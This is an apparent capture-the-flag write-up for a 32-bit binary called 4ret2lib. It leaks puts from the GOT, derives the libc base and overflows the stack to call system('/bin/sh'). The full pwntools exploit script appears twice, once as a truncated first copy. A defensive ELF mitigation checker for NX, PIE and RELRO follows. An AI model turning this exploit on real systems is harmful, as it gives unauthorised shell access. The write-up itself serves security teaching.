Running checksec shows that NX is enabled.
Loading it into IDA: there is no system and no "/bin/sh" string in the binary.

The first input reads a decimal address and prints back the contents stored at that address. That immediately suggests using this feature to print the real address of puts: read the puts entry in the GOT, which holds the address puts was resolved to at runtime. With the real address of puts, subtract its offset inside libc to get the libc load base, add the offsets of system and "/bin/sh" from the same libc, and we have their real addresses, which is enough to get a shell.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./4ret2lib')
elf = ELF('./4ret2lib')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
# Address of the puts entry in the GOT (fixed, since the binary is not PIE);
# this is the value we will feed to the first input in decimal
puts_got = elf.got['puts']
print(puts_got)

Script:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./4ret2lib')
elf = ELF('./4ret2lib')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Address of the puts GOT entry in the (non-PIE) binary
puts_got = elf.got['puts']
print(puts_got)

# First input: send the GOT address in decimal; the program prints the value
# stored there, i.e. the runtime address of puts inside libc ("0x" + 8 hex digits)
p.sendline(str(puts_got).encode())
p.recvuntil(b": ")
puts_addr = int(p.recv(10), 16)

# libc base = leaked puts address - offset of puts inside libc;
# system and "/bin/sh" sit at fixed offsets from that base
puts_libc = libc.symbols['puts']
system_libc = libc.symbols['system']
binsh_libc = next(libc.search(b'/bin/sh'))
offset = puts_addr - puts_libc
system_addr = offset + system_libc
binsh_addr = offset + binsh_libc

# Second input: 60 bytes of padding up to the saved return address, then the
# fake frame: system, a dummy return address, and the pointer to "/bin/sh"
payload = b"A" * 60
payload += p32(system_addr) + b'b' * 4 + p32(binsh_addr)
p.sendline(payload)
p.interactive()
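The whole chain works because NX only stops code on the stack: the binary is not PIE, so the GOT address is known, and the leak primitive turns one known address into the libc base. The check a defender wants is therefore PIE (and RELRO), not just NX. The following stdlib-only mitigation checker is an added example, not code from the write-up; it reads the ELF program headers the way checksec does (a missing PT_GNU_STACK is reported as NX disabled, and "relro" only means a PT_GNU_RELRO segment exists; full RELRO additionally needs BIND_NOW, which is not parsed here). The header-only ELF32 image built by build_sample_elf32 is constructed sample input, not a real binary.

```python
import struct

# Real ELF constants (from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474e551, 0x6474e552
PF_X, PF_W, PF_R = 1, 2, 4

def elf_mitigations(data):
    """Report NX / PIE / RELRO for a little-endian ELF32 or ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    e_type = struct.unpack_from("<H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    # Like checksec, treat a missing PT_GNU_STACK as "NX disabled"
    nx, relro = False, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from("<II", data, off)
        else:
            p_type = struct.unpack_from("<I", data, off)[0]
            p_flags = struct.unpack_from("<I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    # PIE binaries are ET_DYN: their GOT address is randomised by ASLR
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def build_sample_elf32(pie, nx, relro):
    """Constructed header-only ELF32 image used as sample input (not a real binary)."""
    phdrs = [(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X))]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9   # ELFCLASS32, LSB, version 1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", ET_DYN if pie else ET_EXEC,
                               3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = b"".join(struct.pack("<8I", t, 0, 0, 0, 0, 0, f, 1) for t, f in phdrs)
    return ehdr + body

if __name__ == "__main__":
    # Profile of the write-up's target: NX on, but neither PIE nor RELRO
    print(elf_mitigations(build_sample_elf32(pie=False, nx=True, relro=False)))
```

For a real file, pass `open(path, "rb").read()` to elf_mitigations; a result with "pie": False is the condition that makes a GOT address guessable without any further leak.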